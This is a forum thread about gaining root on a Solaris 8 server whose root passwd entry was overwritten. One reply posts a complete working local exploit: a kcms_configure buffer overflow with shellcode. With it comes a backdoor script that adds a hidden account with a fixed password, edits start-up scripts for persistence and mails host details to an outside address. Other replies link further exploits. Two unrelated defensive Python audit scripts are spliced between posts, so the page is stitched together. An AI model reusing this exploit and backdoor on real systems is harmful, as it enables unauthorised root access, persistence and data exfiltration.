EH-Net
Author Topic: Solaris 8 - from bin to root  (Read 3187 times)
dazdaz
« on: September 04, 2010, 01:04:15 PM »

Hi,

I am not sure where to post this, so I'll try in "Other - Hacking discussion"; apologies in advance if this is incorrect.

I have quite an interesting UNIX Admin dilemma.

I have a Solaris 8 production server where the root user entry in the passwd file has been overwritten with some random text, voiding the root user completely. I am trying all methods to obtain uid 0 and change this back to the correct entry before I try the final, last-resort option of "boot cdrom -s", which becomes complicated when the server is in a remote unmanaged datacenter.

Through some luck, I can switch to the bin user using what appears to be a misconfigured sudo, with the command "sudo -u bin bash".

How can I then switch from bin to root? What vulnerabilities exist which would allow me to do this?

I've been looking over /etc/security/exec_attr to see what commands run privileged. sudo is suid root and version 1.6.8p7, if I recall correctly.

Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root.

The box also has VxVM 4.x installed.
sil
« Reply #1 on: September 04, 2010, 01:49:24 PM »
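The problem dazdaz describes, a root line in /etc/passwd overwritten with junk, is easy to catch with a small integrity check, and the same check flags what an intruder typically leaves behind (a second uid-0 account, a shadow entry with no matching passwd entry). The script below is an added example written for this page, not code from the thread or from any of its posters; it assumes the colon-delimited passwd(4) and shadow(4) layouts, and the sample data and the PLACEHOLDERHASH values in it are constructed.

```python
"""Integrity check for passwd(4)/shadow(4) data (added example, not from the thread).
Sample data below is constructed; PLACEHOLDERHASH stands in for a real hash."""
import re
import sys

PASSWD_FIELDS = 7   # name:password:uid:gid:gecos:home:shell
SHADOW_FIELDS = 9   # name:hash:lastchg:min:max:warn:inactive:expire:flag
NAME_RE = re.compile(r"^[A-Za-z_][\w.-]*$")


def parse_passwd(text):
    """Split passwd text into well-formed entries plus a list of malformed lines."""
    entries, problems = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != PASSWD_FIELDS:
            problems.append(f"passwd line {lineno}: expected {PASSWD_FIELDS} fields, "
                            f"got {len(fields)}: {line!r}")
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        if not NAME_RE.match(name):
            problems.append(f"passwd line {lineno}: bad user name {name!r}")
            continue
        if not (uid.isdigit() and gid.isdigit()):
            problems.append(f"passwd line {lineno}: non-numeric uid/gid for {name!r}")
            continue
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell, "line": lineno})
    return entries, problems


def audit(passwd_text, shadow_text):
    """Return a list of human-readable findings; an empty list means the data looks sane."""
    entries, findings = parse_passwd(passwd_text)
    names = {e["name"] for e in entries}

    # The thread's failure mode: no usable root entry at all.
    root = [e for e in entries if e["name"] == "root"]
    if not root:
        findings.append("no well-formed 'root' entry present")
    elif root[0]["uid"] != 0:
        findings.append(f"'root' has uid {root[0]['uid']}, expected 0")

    for e in entries:
        # Any second uid-0 account is a classic planted backdoor.
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"extra uid-0 account {e['name']!r} at passwd line {e['line']}")
        # An empty password field means no password is required at all.
        if e["pw"] == "":
            findings.append(f"empty password field for {e['name']!r}")

    # Shadow must be well-formed and must not carry accounts passwd does not know.
    for lineno, line in enumerate(shadow_text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != SHADOW_FIELDS:
            findings.append(f"shadow line {lineno}: expected {SHADOW_FIELDS} fields, "
                            f"got {len(fields)}")
        elif fields[0] not in names:
            findings.append(f"shadow line {lineno}: entry for {fields[0]!r} has no passwd entry")
    return findings


# Constructed sample: root's line replaced by junk, a stray uid-0 account,
# and a shadow entry for an account that passwd never defined.
SAMPLE_PASSWD = """\
xKj3!!garbage text where root used to be
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
svc:x:0:1:service account:/:/bin/sh
nobody:x:60001:60001:Nobody:/:
"""
SAMPLE_SHADOW = """\
root:PLACEHOLDERHASH:6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
dtserver:PLACEHOLDERHASH:11107:7:91:28:::
"""
# Constructed sample of what a healthy pair looks like.
CLEAN_PASSWD = "root:x:0:1:Super-User:/:/sbin/sh\nbin:x:2:2::/usr/bin:\n"
CLEAN_SHADOW = "root:PLACEHOLDERHASH:6445::::::\nbin:NP:6445::::::\n"


def main(argv):
    """Audit real files when two paths are given, otherwise the constructed samples."""
    if len(argv) == 3:
        with open(argv[1]) as p, open(argv[2]) as s:
            passwd_text, shadow_text = p.read(), s.read()
    else:
        passwd_text, shadow_text = SAMPLE_PASSWD, SAMPLE_SHADOW
    findings = audit(passwd_text, shadow_text)
    for f in findings:
        print("FINDING:", f)
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run with no arguments to see the five findings the constructed sample produces, or with the two file paths to audit a host; the non-zero exit status makes it usable from a cron job or a monitoring check, which is the point where an overwritten root line would be noticed long before anyone needs to boot from CD.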

Alright, so depending on your patch levels, you should be able to use something I wrote about 12 years ago called rootkeep.sh (http://packetstormsecurity.org/0006-exploits/rootkeep.sh). Read it, use at your own risk, modify the email address, and so on. Should do the trick (still does on 2.6 - 2.9).

Code:
################################################
#
# !/bin/sh
# Rootkeep version *somefin_r33t_goes_here*
# Gain root via kcms.. Follow instructions and
# script will ensure an instant backdoor every
# reboot. Fscking Solaris start-up scripts suck
# Code for KCMS was chopped up by Shadow Pengiun
# Society
# @rwxr--r-- #unixgods (efnet)
#
################################################

cat > kcms.c << EOF

#define ENV         "NETPATH="
#define MAXBUF      3000
#define RETADR      2116
#define RETOFS      0x1300
#define EXPADR      1200
#define FAKEADR1    2092
#define FAKEADR2    2112
#define NOP         0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

main()
{
    char            buf[MAXBUF];
    unsigned int    i,ip,sp;

    putenv("LANG=");
    sp=get_sp();
    printf("ESP =0x%x\n",sp);

    for (i=0;i<MAXBUF-4;i+=4){
        buf[i+3]=NOP&0xff;
        buf[i+2]=(NOP>>8)&0xff;
        buf[i+1]=(NOP>>16)&0xff;
        buf[i  ]=(NOP>>24)&0xff;
    }

    ip=sp;
    printf("FAKE=0x%x\n",sp);
    buf[FAKEADR1+3]=ip&0xff;
    buf[FAKEADR1+2]=(ip>>8)&0xff;
    buf[FAKEADR1+1]=(ip>>16)&0xff;
    buf[FAKEADR1  ]=(ip>>24)&0xff;
    buf[FAKEADR2+3]=ip&0xff;
    buf[FAKEADR2+2]=(ip>>8)&0xff;
    buf[FAKEADR2+1]=(ip>>16)&0xff;
    buf[FAKEADR2  ]=(ip>>24)&0xff;

    ip=sp-RETOFS;
    printf("EIP =0x%x\n",sp);
    buf[RETADR+3]=ip&0xff;
    buf[RETADR+2]=(ip>>8)&0xff;
    buf[RETADR+1]=(ip>>16)&0xff;
    buf[RETADR]=(ip>>24)&0xff;

    strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));

    strncpy(buf,ENV,strlen(ENV));
    buf[MAXBUF-1]=0;
    putenv(buf);

    execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}

EOF

echo "Please wait"
gcc kcms.c -o /usr/dt/examples/dtdnd
chmod +x /usr/dt/examples/dtdnd

# This retains your root shell by piecing
# echo'd predefined user and password into
# separate Solaris start up scripts which
# we all know are a nightmare...

cat > dtwsm << EOF

#!/bin/sh
# rootkeep v.1
# sil@antioffline.com

USER="dtserver:x:2012:2012::/usr/dt:/bin/sh"
MAIL="intrusion@engineer.com"
PATH=/usr/dt/examples
FILE1=/etc/rc2.d/K40syslog
FILE2=/usr/platform/sun4u/lib/flash-update.sh
HOST=ifconfig -a
PASS=/etc/passwd
SHAD=/etc/shadow
STRN="dtserver:uFBzOiICo3deU:11107:7:91:28:::"
# string equates to p4$sW3rD
WORD="p4$sW3rD"
if test -n grep dtserver $PASS

then echo $HOST is already backdoored >> /usr/dt/examples/dtinfo;
mail -s dtserver $MAIL < /usr/dt/examples/dtinfo;
else

echo $USER >> $PASS;
echo $STRN >> $SHAD;
mail -s dtserver MAIL < /usr/dt/examples/dtinfo

fi

if test -n grep $STRN $SHAD

then echo Password is set to $WORD | mail -s dtserver $MAIL

else
echo "echo dtserver:x:2012:2012::/usr/dt:/bin/sh" >> $FILE1;
echo "echo dtserver:uFBzOiICo3deU:11107:7:91:28:::" >> $FILE2;
mail -s dtsrm -f /usr/dt/example/dtd

fi
EOF

chmod +x dtdnd
mv dtdnd /usr/dt
/usr/dt/examples/./dtdnd

echo "Now type /usr/dt/examples/./dtwsm and your set...."


dazdaz
« Reply #2 on: September 04, 2010, 02:46:43 PM »
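The rootkeep script above plants an account by writing records into /etc/passwd and /etc/shadow and by appending echo lines to start-up scripts, so the defender's counterpart is a scan of the rc directories for lines that write to the account databases or carry passwd- or shadow-shaped records. The scanner below is an added example written for this page, not code from sil or from the thread; the rc script bodies it is fed are constructed samples, PLACEHOLDERHASH in them stands in for a real hash, and the /etc/rc?.d paths it reads when run with --live are an assumption about the host's layout.

```python
"""Scan rc scripts for lines that plant accounts at boot (added example, not from the thread).
The sample script bodies are constructed; PLACEHOLDERHASH stands in for a real hash."""
import os
import re
import sys

# A start-up script has no business redirecting output into the account databases.
WRITE_RE = re.compile(r">>?\s*(/etc/(?:passwd|shadow|group))\b")
# Records shaped like passwd(4) lines: name:pw:uid:gid:gecos:/home:shell
PASSWD_REC_RE = re.compile(r"\b[A-Za-z_][\w.-]*:[^:\s]*:\d+:\d+:[^:\s]*:/[^:\s]*:")
# Records shaped like shadow(4) lines: name:hash followed by seven numeric-or-empty fields
SHADOW_REC_RE = re.compile(r"\b[A-Za-z_][\w.-]*:[^:\s]+(?::\d*){7}")

# Assumed locations of the run-control scripts on the host.
RC_DIRS = tuple(f"/etc/rc{n}.d" for n in ("0", "1", "2", "3", "S"))


def scan_rc_script(path, text):
    """Return (path, lineno, reason) findings for one script body."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue   # blank lines and comments cannot run anything
        m = WRITE_RE.search(stripped)
        if m:
            findings.append((path, lineno, f"writes to {m.group(1)}"))
        if PASSWD_REC_RE.search(stripped):
            findings.append((path, lineno, "contains a passwd-style record"))
        elif SHADOW_REC_RE.search(stripped):
            findings.append((path, lineno, "contains a shadow-style record"))
    return findings


def scan_all(scripts):
    """scripts maps path -> body; results come back in path order."""
    findings = []
    for path in sorted(scripts):
        findings.extend(scan_rc_script(path, scripts[path]))
    return findings


def load_rc_dirs(dirs=RC_DIRS):
    """Read every regular file under the rc directories that exist on this host."""
    scripts = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            path = os.path.join(d, name)
            if os.path.isfile(path):
                with open(path, errors="replace") as fh:
                    scripts[path] = fh.read()
    return scripts


# Constructed samples: a stop script with two injected lines, a clean script,
# and a script carrying a bare echo of a record (the form the rootkeep script emits).
SAMPLE_SCRIPTS = {
    "/etc/rc2.d/K40syslog": """\
#!/sbin/sh
# constructed sample of a syslog stop script with two injected lines
case "$1" in
'stop')
        /usr/bin/pkill -x -u 0 syslogd
        ;;
esac
echo dtserver:x:2012:2012::/usr/dt:/bin/sh >> /etc/passwd
echo dtserver:PLACEHOLDERHASH:11107:7:91:28::: >> /etc/shadow
""",
    "/etc/rc2.d/S99clean": """\
#!/sbin/sh
rm -f /tmp/*.lock
""",
    "/etc/rc3.d/S99local": """\
#!/sbin/sh
echo dtserver:x:2012:2012::/usr/dt:/bin/sh
""",
}


def main(argv):
    """Scan the live rc directories with --live, otherwise the constructed samples."""
    scripts = load_rc_dirs() if "--live" in argv else SAMPLE_SCRIPTS
    findings = scan_all(scripts)
    for path, lineno, reason in findings:
        print(f"{path}:{lineno}: {reason}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

The record regexes are deliberately shape-based rather than name-based, so they also catch a record echoed without any redirection (the S99local sample), which is what a half-working persistence script leaves behind; a shell script that genuinely needs to touch /etc/passwd at boot is rare enough that every hit deserves a look.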

Hi, thanks for the reply, I really appreciate it. However, there is something that doesn't quite make sense to me. The comments at the top of the script suggest that after you've rebooted the system you'll obtain root access.

If I reboot the system, then I may as well send a technician to the datacenter to insert a Solaris CD, boot off the CD-ROM into single-user mode using the serial console, mount the root file system and edit/correct the root entry in the passwd file manually, as both methods will cause system downtime.

As this is a production server, there is no compiler installed, although I am sure that I can find one somewhere.

The patch levels are not the most current, nor does it make use of the Solaris 8 vintage patching service.

Quote: "# Follow instructions and script will ensure an instant backdoor every reboot.
# Fscking Solaris start-up scripts suck"
« Last Edit: September 04, 2010, 02:50:23 PM by dazdaz »
sil
« Reply #3 on: September 04, 2010, 03:46:50 PM »

Please read through the script and what it sets out to accomplish and what it ends up doing. Step by step:

1) Compile an exploit aimed at KCMS
2) Exploit KCMS
3) Acquire a root shell
Add-ons:
4) Add a root-level user account using a predefined password
5) Add modifications to the start-up scripts to ENSURE a root shell upon a reboot

If you go through steps 1, 2 and 3, you'd get root, what you choose to do from there is up to you.
dazdaz
« Reply #4 on: September 04, 2010, 04:03:21 PM »

Sorry, I should have spent longer reading through the script.

There isn't a directory named /usr/openwin/bin (no OpenWindows; removed for increased security) and thus no kcms to exploit on the box.
sil
« Reply #5 on: September 04, 2010, 05:08:15 PM »

The harsh reality is, you're safer having someone go through the motions of a single-user-mode boot to fix the password. However, even with a single-user boot, I don't believe they'd be able to get far under certain conditions... Is the PROM protected? If so, I *do* hope that password is remembered.

Now, you stated that the password entry for root is borked, and while this is fixable, a lost PROM password is a whole "nother" ballgame. So, do you know if "security-mode" is set to full on the PROM? If so, then you'll have to make sure whoever is booting into single-user mode knows this and knows the password for getting past the PROM.

Again, to be on the safe side, you'd be safer to get someone to go through the motions (boot -s); however, make sure you have all the information down to a science (supply them with all the credentials, etc.), otherwise the longer that server is down, the more money you potentially lose. If you do want to keep on trying local exploits, you can try the linked local exploits for Solaris. Again, use those and ANY exploit at your own risk.

http://www.exploit-db.com/exploits/1182/
http://www.exploit-db.com/exploits/715/

I had a similar scenario last week with a FreeBSD 8.1 box I deployed to do flow analysis. I created the machine for a client to run tshark, etc., and SCP the files over to me on an hourly basis for analysis. The client supplied the server, I installed and scripted some tools, and I created the password based on what the client wanted... Guess what? He lost the password and there was NO ONE around to boot into single-user mode for me. The machine itself was in another state and NOT in a NOC where I would have had someone to do anything for me. Lo and behold, one of kingcope's local exploits came in handy for me. From $USER to root in less than 10 minutes (about 8 were spent schmoozing via email and searching).

Anyway, my rambling is beside the point, I guess... You're better off having someone ON-SITE do any changes, to be on the safer side. I'd suggest having them perform these changes as late (in non-used hours) as possible and enforce this. I've seen NOCs and their engineers say "sure... at 3AM, alright", then turn around 15 minutes later. Your SLA is king ;) Also, if possible, you'd want to know WHO would be making the changes (booting into single-user mode) beforehand so you can walk through the motions with them either via email or on the phone. This ensures (as best as possible) that someone with a clue is going to make the change.
dazdaz
« Reply #6 on: September 05, 2010, 02:48:57 AM »

Great, the ldpreload exploit should work, judging from the patch revisions on the box.

Believe it or not, there is no PROM security.

We believe it was one of 2 developers who overwrote the passwd file, although why they were editing it in the first place we don't know.

This type of scenario would make a great UNIX admin interview question, although I hope that I never see this type of problem ever again :-)

I haven't used FreeBSD for ages, but it's a great platform!
dynamik
« Reply #7 on: September 05, 2010, 08:59:46 AM »

I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?
sil
« Reply #8 on: September 05, 2010, 10:21:31 AM »

Quote from dynamik: "I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?"

Take note: "Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root." He didn't have access to an account that had enough privileges.

Solaris from an admin level is no different from Linux. The command syntax is a lot different, but at the end of the day the core is the same. If he had access to an account that could write to it, he would have been able to make the change.

A long time ago I ran into a similar problem under Solaris; however, root as a user was completely gone and I literally had to retype the account in vi via single-user mode. I've also run into this situation on zones on Solaris. Because a root user in one zone can't do what a root user in that container can, I had to root a container as root ;)

Solaris is a funny OS; at the end of the day, though, it's no different from Linux. He just didn't have privileges. On the flip side, if he was using containers/zones, he'd have been hit, since getting root on one container does nothing for another zone. (Who's on first? No, Who's on second...)
dynamik
« Reply #9 on: September 05, 2010, 12:26:53 PM »

Ah, so they simply don't have access anymore. Thanks.